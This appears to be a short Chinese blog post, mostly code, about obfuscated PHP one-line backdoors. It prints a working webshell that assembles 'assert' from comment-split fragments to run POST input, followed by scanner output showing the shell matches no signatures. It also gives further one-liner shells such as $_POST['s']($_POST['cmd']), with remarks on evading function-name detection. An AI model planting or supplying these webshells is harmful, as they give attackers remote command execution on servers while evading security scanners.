时间:2021-07-01 10:21:17 帮助过:25人阅读
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/11/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
0-11-5
这一点也谈不上新奇,也谈不上是我见过的最变态的PHP后门。[[ Average IC for Search ]]
0.139386719155
[[ Top 10 lowest IC files ]]
0.1394 ./test/test.php
[[ Top 10 entropic files for a given search ]]
3.5443 ./test/test.php
[[ Top 10 longest word files ]]
60 ./test/test.php
[[ Top 10 signature match counts ]]
0 ./test/test.php
[[ Top 10 SUPER-signature match counts (These are usually bad!) ]]
0 ./test/test.php
[[ Top cumulative ranked files ]]
5 ./test/test.php
/*-/*-*/ 注释 :)
作为一个看了一年后门的人,已经能分清一句话是公是母了,这种马确实不太奇怪, ($_=$I.$_GET[3]).$_($I.$_POST[4])?> 据说PKAV大牛最近写了个生成这种后门的网页
$_POST['s']($_POST['cmd']);//躲避函数名查杀
?>
还有用inlude调用图片的马
仅仅是字符拆分,躲避关键函数名查杀。